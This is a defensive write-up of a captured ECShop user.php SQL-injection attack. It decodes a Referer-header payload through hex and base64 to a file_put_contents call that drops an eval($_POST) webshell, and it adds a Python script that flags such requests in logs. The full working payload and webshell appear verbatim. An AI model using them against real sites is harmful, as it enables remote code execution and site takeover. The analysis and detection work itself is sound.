user.php ECShop SQL injection (2017)


Malicious HTTP GET seen 8/20/2019


GET /user.php?act=***** HTTP/1.1

Connection: Keep-Alive
Accept: */*
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:288:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325a6b5a334575634768774a79776e50443977614841675a585a686243676b583142505531526262475678645630704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
Host: redacted.com




   The payload is not in the request line but in the Referer header, which carries a hash-like prefix followed by a PHP-serialized array. The "num" member holds a UNION SELECT whose columns are hex literals (0x272f2a is simply '/*). To see what it is trying to do, convert the long hex literal to ASCII:

   0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325a6b5a334575634768774a79776e50443977614841675a585a686243676b583142505531526262475678645630704f79412f506963702729293b2f2f7d787878

   becomes



  {$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ2ZkZ3EucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbbGVxdV0pOyA/Picp'));//}xxx





   The decoded string is PHP that passes a base64 blob to assert(base64_decode(...)), so the next step is to decode that base64 string:

   ZmlsZV9wdXRfY29udGVudHMoJ2ZkZ3EucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbbGVxdV0pOyA/Picp

   becomes



   file_put_contents('fdgq.php','<?php eval($_POST[lequ]); ?>')



   which writes a file named fdgq.php containing a PHP webshell in its simplest form: eval() of whatever arrives in the "lequ" request parameter.

   If the write succeeds, the attacker would then use it along the lines of

    redacted.com/fdgq.php?lequ=whoami

   where "whoami" is whatever command the attacker wants to execute. Note that the dropped shell reads $_POST, so in practice the command arrives in a POST body rather than in the query string; on the wire, the thing to look for is POST requests to a freshly created .php file in the web root.





  This is an attempt to exploit an ECShop SQL injection vulnerability (note the union select in the Referer above) that can lead to remote code execution, here used to create a webshell. Reference:

https://github.com/vulhub/vulhub/tree/master/ecshop/xianzhi-2017-02-82239600
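The decoding chain above (serialized Referer, hex literal inside the SQL, base64 inside the assert) can be automated so that a log review flags this pattern instead of decoding by hand. The script below is an added example written for this post, not code from the original post or from vulhub; function names, the indicator labels and the sample request (the request above, with the act value redacted as in the post) are this example's own choices.

```python
"""Decode and flag an ECShop-style Referer payload from a raw HTTP request.

Walks the same layers the write-up decodes by hand:
  1. pull the Referer header out of the request,
  2. extract the strings from the PHP-serialized array by their declared lengths,
  3. decode the 0x... hex literals used inside the UNION SELECT,
  4. decode the base64 argument handed to assert(base64_decode(...)),
then reports indicators a reviewer would want to see.
"""
import base64
import re

# Constructed sample: the request shown in the post (act value redacted there too).
SAMPLE_REQUEST = (
    "GET /user.php?act=***** HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Accept: */*\r\n"
    'Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:288:"*/ union select '
    "1,0x272f2a,3,4,5,6,7,8,"
    "0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a32"
    "5a6b5a334575634768774a79776e50443977614841675a585a686243676b583142505531526262475678645630704f79412f506963702729293b2f2f7d787878"
    ',10-- -";s:2:"id";s:3:"\'/*";}\r\n'
    "User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\r\n"
    "Host: redacted.com\r\n\r\n"
)

HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2})+)")          # MySQL hex literal, whole bytes only
SERIALIZED_STR = re.compile(rb's:(\d+):"')                    # PHP serialize() string header
B64_ARG = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
DROPPED_FILE = re.compile(r"file_put_contents\(\s*['\"]([^'\"]+)['\"]")
EVAL_OF_INPUT = re.compile(r"(eval|assert)\(\s*\$_(POST|GET|REQUEST|COOKIE)")


def referer_from_request(raw):
    """Return the Referer header value from a raw HTTP request, or None."""
    for line in raw.split("\r\n"):
        if line.lower().startswith("referer:"):
            return line.split(":", 1)[1].strip()
    return None


def serialized_strings(blob):
    """Extract string members of a PHP-serialized blob using their declared byte
    lengths, so quotes inside an SQL payload cannot confuse the extraction."""
    raw = blob.encode("latin-1")
    out, pos = [], 0
    while True:
        m = SERIALIZED_STR.search(raw, pos)
        if not m:
            return out
        n, start = int(m.group(1)), m.end()
        out.append(raw[start:start + n].decode("latin-1"))
        pos = start + n


def decode_hex_literals(text):
    """Decode every 0x... literal in the text to its ASCII/latin-1 form."""
    return [bytes.fromhex(h).decode("latin-1") for h in HEX_LITERAL.findall(text)]


def decode_base64_args(text):
    """Decode each base64 string passed to base64_decode(...), padding if needed."""
    out = []
    for b in B64_ARG.findall(text):
        out.append(base64.b64decode(b + "=" * (-len(b) % 4)).decode("latin-1"))
    return out


def analyze_referer(referer):
    """Decode all layers of the Referer and return the findings as a dict."""
    prefix, _, serialized = referer.partition("|")
    strings = serialized_strings(serialized) if serialized else []
    hex_decoded = decode_hex_literals(referer)
    b64_decoded = [d for h in hex_decoded for d in decode_base64_args(h)]
    visible = "\n".join([referer] + hex_decoded + b64_decoded)   # every layer we could unwrap

    indicators = []
    if re.search(r"union\s+select", visible, re.I):
        indicators.append("sql-union-select")
    if hex_decoded:
        indicators.append("hex-encoded-sql-literal")
    if b64_decoded:
        indicators.append("base64-in-assert")
    if EVAL_OF_INPUT.search(visible):
        indicators.append("webshell-eval-of-request-input")
    dropped = [f for d in b64_decoded for f in DROPPED_FILE.findall(d)]
    if dropped:
        indicators.append("file-write-via-file_put_contents")

    return {
        "prefix": prefix,
        "strings": strings,
        "hex_decoded": hex_decoded,
        "base64_decoded": b64_decoded,
        "dropped_files": dropped,
        "indicators": indicators,
    }


if __name__ == "__main__":
    report = analyze_referer(referer_from_request(SAMPLE_REQUEST))
    for key, value in report.items():
        print(f"{key}: {value}")
```

Running it on the sample request prints the two decoded layers, the dropped file name fdgq.php and the indicator list; on an ordinary Referer the indicator list is empty, which is what makes the function usable as a filter over access logs.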
